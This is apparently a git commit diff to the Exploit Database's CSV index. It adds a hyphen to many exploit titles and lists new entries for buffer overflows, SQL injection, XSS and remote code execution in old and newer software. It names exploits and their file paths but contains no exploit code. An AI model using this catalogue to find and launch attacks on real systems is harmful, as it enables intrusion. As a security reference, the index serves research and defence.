DB: 2016-04-05

4 new exploits

Outlook ATTACH_BY_REF_ONLY File Execution
Outlook - ATTACH_BY_REF_ONLY File Execution

HB Ecommerce SQL Injection Vulnerability
HB Ecommerce - SQL Injection Vulnerability

SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability
SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability

Debian Linux <= 2.1 Print Queue Control Vulnerability
Debian Linux <= 2.1 - Print Queue Control Vulnerability

FreeBSD 3.3 gdc Buffer Overflow Vulnerability
FreeBSD 3.3 gdc - Buffer Overflow Vulnerability

Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability
Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability

NullSoft Winamp 2.10 Playlist Vulnerability
NullSoft Winamp 2.10 - Playlist Vulnerability

S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)
S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)

Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability
Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability

NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability
NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability

NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability
NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability

My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability
My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability

Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference
Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference

Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability
Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability

Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability
Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability

IDA Pro 6.3 Crash PoC
IDA Pro 6.3 - Crash PoC

Confixx 2 Perl Debugger Remote Command Execution Vulnerability
Confixx 2 - Perl Debugger Remote Command Execution Vulnerability

Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability
Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability

Novell NetMail 3.x Automatic Script Execution Vulnerability
Novell NetMail 3.x - Automatic Script Execution Vulnerability

Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability
Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability

Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability
Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability

WordPress Freshmail Unauthenticated SQL Injection
WordPress Freshmail - Unauthenticated SQL Injection

WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS

Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass

ADH-Web Server IP-Cameras - Multiple Vulnerabilities
Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC
Hexchat IRC Client 2.11.0 - Directory Traversal
Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow
PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities
Offensive Security 2016-04-05 05:03:46 +00:00
parent 5a85093c53
commit 13d072b592
8 changed files with 507 additions and 179 deletions


@ -14504,7 +14504,7 @@ id,file,description,date,author,platform,type,port
16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,metasploit,windows,remote,80
16698,platforms/windows/remote/16698.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,metasploit,windows,remote,0
16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,metasploit,windows,remote,0
16700,platforms/windows/remote/16700.rb,"Outlook ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0
16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0
16701,platforms/windows/remote/16701.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,windows,remote,3306
16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,metasploit,windows,remote,21
16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server Input Overflow",2010-10-05,metasploit,windows,remote,0
@ -15068,7 +15068,7 @@ id,file,description,date,author,platform,type,port
17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0
17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection Vulnerability",2011-05-26,"AutoSec Tools",php,webapps,0
17326,platforms/windows/shellcode/17326.rb,"DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0
17327,platforms/php/webapps/17327.txt,"HB Ecommerce SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0
17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0
17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0
17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0
17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0
@ -16525,7 +16525,7 @@ id,file,description,date,author,platform,type,port
19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0
19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0
19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 - /etc/group missing results in Root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0
19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0
19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0
19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D symlink Vulnerability",1998-07-15,emffmmadffsdf,linux,remote,0
19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid Vulnerability",1999-04-29,"Dan Sugalski",linux,local,0
19126,platforms/solaris/local/19126.txt,"Sun Solaris <= 2.6 power management Vulnerability",1998-07-16,"Ralf Lehmann",solaris,local,0
@ -16761,7 +16761,7 @@ id,file,description,date,author,platform,type,port
19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"Jesús López de Aguileta",multiple,remote,0
19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0
19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0
19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0
19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 - Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0
19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0
19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0
19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0
@ -17018,7 +17018,7 @@ id,file,description,date,author,platform,type,port
19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow Vulnerability (2)",1999-11-30,"Synnergy Networks",unix,remote,0
19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure",1999-11-30,UNYUN,solaris,local,0
19648,platforms/solaris/local/19648.c,"Solaris 7.0 CDE dtmail/mailtool Buffer Overflow Vulnerability",1999-11-30,UNYUN,solaris,local,0
19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc Symlink Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 Seyon setgid dialer Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
@ -17069,7 +17069,7 @@ id,file,description,date,author,platform,type,port
19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0
19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow Vulnerability",1999-12-31,"Ussr Labs",windows,dos,0
19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH Vulnerability",1999-12-30,Loneguard,multiple,local,0
19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0
19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0
19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 midikeys/soundplayer Vulnerability",1999-12-31,Loneguard,irix,local,0
19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link Vulnerability",1999-12-31,Loneguard,unix,local,0
19708,platforms/php/remote/19708.php,"PHP <= 3.0.13 - 'safe_mode' Failure Vulnerability",2000-01-04,"Kristian Koehntopp",php,remote,0
@ -17084,7 +17084,7 @@ id,file,description,date,author,platform,type,port
19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0
19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0
19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0
19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0
19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0
19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability",2000-02-15,"Viktor Fougstedt",multiple,local,0
19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1_IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0
19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH Vulnerability",2000-01-12,"Cesar Tascon Alvarez",linux,local,0
@ -17308,7 +17308,7 @@ id,file,description,date,author,platform,type,port
19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability",2000-05-18,"Chris Evans",linux,dos,0
19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0_Cart32 2.5 a/3.0_Shop Express 1.0_StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability",2000-02-01,CDI,cgi,remote,0
19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0
19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0
19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0
19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0
19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0_qpopper 2.52/2.53 - 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0
19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal Vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000
@ -17732,15 +17732,15 @@ id,file,description,date,author,platform,type,port
20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0
20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS Vulnerability",2000-11-10,sozni,cgi,dos,0
21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0
20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0
20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0
20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0
20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,dos,0
20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0
20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0
20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0
20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - _thesection_ Directory Traversal Vulnerability",2000-11-20,zorgon,cgi,remote,0
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 Svgalib Buffer Overflow Vulnerability",2000-11-20,Synnergy.net,unix,local,0
20411,platforms/linux/local/20411.c,"Oracle 8.x cmctl Buffer Overflow Vulnerability",2000-11-20,anonymous,linux,local,0
20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 JSP Source Disclosure Vulnerability",2000-11-21,"Wojciech Woch",jsp,remote,0
@ -18836,7 +18836,7 @@ id,file,description,date,author,platform,type,port
21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0
21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0
21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File Arbitrary Command Execution Vulnerability",2002-06-15,onlooker,php,webapps,0
21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0
21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0
21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)",2002-06-17,"Gobbles Security",multiple,remote,0
21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)",2002-06-17,"Gobbles Security",multiple,remote,0
21561,platforms/hardware/dos/21561.txt,"Zyxel Prestige 642R Malformed Packet Denial of Service Vulnerability",2002-07-17,"Kistler Ueli",hardware,dos,0
@ -19107,7 +19107,7 @@ id,file,description,date,author,platform,type,port
21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability",2002-09-23,"Taylor Huff",hardware,remote,0
21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service Vulnerability",2002-09-24,"Brook Powers",hardware,dos,0
21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection Vulnerability",2002-09-24,das@hush.com,php,webapps,0
21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0
21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload Vulnerability",2012-10-10,metasploit,php,webapps,0
21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload Vulnerability",2012-10-10,metasploit,linux,webapps,0
@ -19587,7 +19587,7 @@ id,file,description,date,author,platform,type,port
22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall Content Filter Bypassing Vulnerability",2003-03-05,bit_logic,multiple,remote,0
22328,platforms/windows/dos/22328.txt,"Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow Vulnerability",2003-03-05,"Fernandez Madrid",windows,dos,0
22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 HTML Source Password Retrieval Vulnerability",2003-03-03,THR,windows,local,0
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0
22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution Vulnerability",2003-03-06,"gregory Le Bras",php,webapps,0
22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 Logbook.pl Remote Command Execution Vulnerability",2003-03-07,"Aleksey Sintsov",cgi,webapps,0
22338,platforms/windows/remote/22338.txt,"Clearswift MailSweeper 4.x Malformed MIME Attachment Filter Bypass Vulnerability",2003-03-07,http-equiv,windows,remote,0
@ -19622,7 +19622,7 @@ id,file,description,date,author,platform,type,port
22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0
22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0
22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0
22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0
@ -20745,7 +20745,7 @@ id,file,description,date,author,platform,type,port
23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0
23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0
23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0
23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 Crash PoC",2012-12-20,nitr0us,multiple,dos,0
23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0
23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting Vulnerability",2004-01-06,Windak,php,webapps,0
23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 PHPInfo Information Disclosure Weakness",2004-01-06,Windak,php,webapps,0
23527,platforms/hardware/remote/23527.txt,"ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",hardware,remote,0
@ -21008,7 +21008,7 @@ id,file,description,date,author,platform,type,port
23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 Pop Parameter Cross-Site Scripting Vulnerability",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0
23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability",2004-03-09,shaun2k2,windows,remote,0
23797,platforms/php/webapps/23797.txt,"Confixx 2 DB Parameter SQL Injection Vulnerability",2004-03-09,wkr,php,webapps,0
23798,platforms/php/webapps/23798.txt,"Confixx 2 Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0
23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0
23799,platforms/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String Vulnerability",2004-03-10,"Luigi Auriemma",multiple,dos,0
23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0
23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting Vulnerability",2004-03-11,"Donato Ferrante",linux,remote,0
@ -22941,7 +22941,7 @@ id,file,description,date,author,platform,type,port
25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability",2005-06-01,"Jim Pangalos",asp,webapps,0
25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0
25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 LOGIN.ASP SQL Injection Vulnerability",2005-06-01,"Dj romty",asp,webapps,0
25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0
25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0
25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0
25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0
25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0
@ -23068,7 +23068,7 @@ id,file,description,date,author,platform,type,port
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0
25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0
25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0
25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0
25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution Vulnerability",2005-06-29,blahplok,cgi,webapps,0
25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 Read.PHP SQL Injection Vulnerability",2004-10-24,"Positive Technologies",php,webapps,0
@ -23321,7 +23321,7 @@ id,file,description,date,author,platform,type,port
26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0
26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0
26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability",2005-08-17,anonymous,windows,remote,0
26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0
26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0
26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 Site Parameter Directory Traversal Vulnerability",2005-08-18,matrix_killer,php,webapps,0
26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 login.php course Parameter XSS",2005-08-18,matrix_killer,php,webapps,0
26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.PHP Arbitrary Command Execution Vulnerability",2005-08-18,rgod,php,webapps,0
@ -25943,7 +25943,7 @@ id,file,description,date,author,platform,type,port
28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0
28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0
28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.PHP Remote File Include Vulnerability",2006-11-07,navairum,php,webapps,0
